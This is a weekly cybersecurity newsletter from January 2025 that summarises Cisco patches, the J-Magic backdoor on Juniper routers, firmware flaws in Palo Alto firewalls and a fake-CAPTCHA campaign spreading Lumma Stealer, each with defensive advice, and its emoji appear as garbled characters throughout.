Jan 24 2025
Welcome toย Gone Phishing, your weekly cybersecurity newsletter that understands that when it comes to cyber storms: รowyn some, you lose some ๐ Stay safe UK readers โ๏ธ #Stormรowynย
Patch of the Week!ย ๐ฉน
First thingโs first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, thatโs itโฆ ๐ณย
Congrats to Cisco,ย the cybercriminals are no matchโฆ for your patch! ๐ฉน
Check out this freshly hatched patch ๐ฃ
๐จ Cisco Security Alert! Patch Now! ๐ง
Cisco has issued updates to fix critical vulnerabilities in Cisco Meeting Management and other products. Top priority: CVE-2025-20156 (CVSS 9.9), a REST API flaw that lets authenticated attackers escalate privileges to administrator level. ๐
โก Key Details:
1๏ธโฃ CVE-2025-20156 (Critical)
Affects Cisco Meeting Management versions 3.9 and earlier.
Fixes available in 3.9.1; 3.10 is not vulnerable.
Attackers could exploit this to control edge nodes managed by Cisco Meeting Management.
2๏ธโฃ CVE-2025-20165 (DoS)
Found in BroadWorks SIP handling.
Fixed in RI.2024.11.
Exploit could exhaust system memory, causing a DoS.ย
3๏ธโฃ CVE-2025-20128 (DoS)
Impacts ClamAV OLE2 decryption.
Could be exploited for service disruption; PoC exploit exists.
๐ง Action Required:
Update now to patched versions for all affected products.
For Ivanti exploit chains (CVE-2024-8963, CVE-2024-9379, etc.), check for compromise and secure your systems.
Stay vigilant and secure! ๐โจ
Now, on to this weekโs hottest cybersecurity news stories:ย
๐ก Juniper routers exploited by โJ-Magicโ backdoor ๐ช
๐ฅ Palo Alto firewalls exploited via boot bypass flaws ๐
๐ญ Fake CAPTCHA Campaign spreads Lumma stealer ๐ค
๐พ New Threat Alert! Enterprise-grade Juniper Networks routers are under fire from a custom backdoor, dubbed J-magic, that listens for secret "magic packets" to wreak havoc. Hereโs the breakdown:
๐ต๏ธโโ๏ธ Whatโs Happening?
๐ ๏ธ J-Magic infects Juniper routers (using Junos OS, based on FreeBSD).
๐ Active since mid-2023, with infections spanning Europe, Asia, and South America ๐.
๐ฏ Top targets: semiconductor, energy, manufacturing, and IT industries.
๐ป How It Works:
1๏ธโฃ Attackers send "magic packets" via TCP traffic ๐ก.
2๏ธโฃ Backdoor responds with a secondary challenge to block rival hackers ๐.
3๏ธโฃ If successful, the attackers gain control, stealing data or deploying other malware ๐.
โ๏ธ Why Itโs Dangerous:
๐ Targets edge routers acting as VPN gateways ๐.
๐ก๏ธ No endpoint detection (EDR) leaves these devices wide open ๐ณ๏ธ.
๐ Long uptimes make them ideal for nation-state hacking campaigns.
๐ฅ Whatโs at Stake?
Data theft ๐.
Malware deployment ๐ฆ .
Infrastructure sabotage ๐ฃ.
๐ก๏ธ Stay Safe!
โ Keep Juniper routers updated! ๐ ๏ธ
โ Monitor unusual traffic ๐ฆโlook for hidden signals!
โ Restrict access to sensitive router ports ๐.
โ ๏ธ J-Magic marks a bold move against enterprise routers. With nation-state actors leveraging these attacks, the stakes for securing network edge devices have never been higher. Stay vigilant! ๐ชโจ
Ava automates your entire outbound demand generation so you can get leads delivered to your inbox on autopilot. She operates within the Artisan platform, which consolidates every tool you need for outbound:
300M+ High-Quality B2B Prospects
Automated Lead Enrichment With 10+ Data Sources Included
Full Email Deliverability Management
Personalization Waterfall using LinkedIn, Twitter, Web Scraping & More
Book a demo to see what Ava can do.
๐พ Palo Alto Networks firewallsโtrusted guardians of enterprise securityโhave been found vulnerable to critical flaws in their firmware and misconfigured security settings. Letโs break it down:
๐ The Discovery
๐ฌ Security researchers at Eclypsium analyzed three firewall modelsโPA-3260, PA-1410, and PA-415โand uncovered a set of vulnerabilities collectively named PANdoraโs Box ๐งฐ.
๐ PA-3260 has reached end-of-sale (August 2023), but PA-1410 and PA-415 are still fully supported ๐ ๏ธ.
โ ๏ธ Major Findings
๐ก๏ธ BootHole (CVE-2020-10713): Secure Boot bypass vulnerability affecting all three models ๐.
๐พ LogoFAIL: Critical UEFI vulnerabilities on the PA-3260, allowing malicious code execution during startup ๐ฅ.
๐ก PixieFail: TCP/IP stack flaws in PA-1410 and PA-415, leading to code execution & info leaks ๐.
๐ก Insecure Flash Access: SPI flash misconfigurations on the PA-415, enabling UEFI tampering โก.
๐ Intel BootGuard Key Leak: Impacts PA-1410, exposing the device to additional risks ๐.
๐ฏ Why It Matters
These flaws could let attackers bypass Secure Boot, escalate privileges, or inject malicious firmware ๐ฅ.
Vulnerable firewalls could turn into attack platforms, undermining enterprise security ๐ช.
๐ ๏ธ Vendor Response
๐ก๏ธ Palo Alto Networks:
Claims these vulnerabilities canโt be exploited under normal conditions with up-to-date PAN-OS.
No reports of active exploitation.
Working with third-party vendors to roll out mitigations ๐.
๐ก๏ธ Protect Yourself
โ Keep PAN-OS firmware updated.
โ Secure management interfaces according to best practices ๐.
โ Regularly monitor device integrity and firmware ๐ฆ.
โ ๏ธ Even the strongest defenses need defense! Stay vigilant, update often, and donโt let your firewalls become weak links. ๐๐ฅ
Join The AI Report, trusted by 400,000+ professionals at Google, Microsoft, and OpenAI. Get daily insights, tools, and strategies to master practical AI skills that drive results.
Sign up now for free and work smarter, not harder.
โ ๏ธ Cybercriminals are stepping up their game with fake CAPTCHA pages to spread the notorious Lumma Stealer malware. This malware-as-a-service (MaaS) threat is targeting individuals and organizations worldwide ๐.ย
๐ต๏ธโโ๏ธ The Attack
1๏ธโฃ Victims land on compromised websites that redirect them to fake CAPTCHA pages ๐ค.
2๏ธโฃ Instead of verifying, users are tricked into running a Windows Run command that triggers a chain reaction:
The command uses mshta.exe to download and execute a remote HTA file ๐ป.
This file executes PowerShell scripts to bypass detection and deploy the Lumma Stealer payload ๐ ๏ธ.
3๏ธโฃ These steps occur outside the browser, bypassing browser-based security defenses ๐.
๐ Global Reach
๐ Targeted countries: Argentina, Colombia, U.S., Philippines, and others.
๐ข Targeted industries: Telecom, healthcare, banking, and marketing.
๐ Lummaโs Evolution
๐งฉ Previous Method: Used Base64 PowerShell scripts in a campaign known as ClickFix.
๐พ Current Method: Adds complexity with multiple PowerShell stages, AMSI bypasses, and delivery via fake CAPTCHA interactions.
โ๏ธ New Threats Emerge
๐ Attackers are also using 1,000+ fake domains mimicking Reddit, WeTransfer, and more to spread SelfAU3 Droppers packed in password-protected archives ๐๏ธ.
๐ง Meanwhile, Phishing-as-a-Service (PhaaS) kits like Tycoon 2FA are enhancing evasion techniques, using compromised email accounts and detecting security tools ๐.
๐ก๏ธ How to Stay Safe
โ๏ธ Avoid commands from suspicious sitesโnever paste commands into Windows Run prompts.
โ๏ธ Update antivirus tools to recognize AMSI-bypass techniques.
โ๏ธ Educate users on spotting fake CAPTCHAs and social engineering tactics.
๐จ Pro tip:ย If it seems fishy, donโt click it! Fake CAPTCHA scams are the latest twist in cybercriminal playbooks. Stay alert! ๐ฅ๏ธ๐
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตCrypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!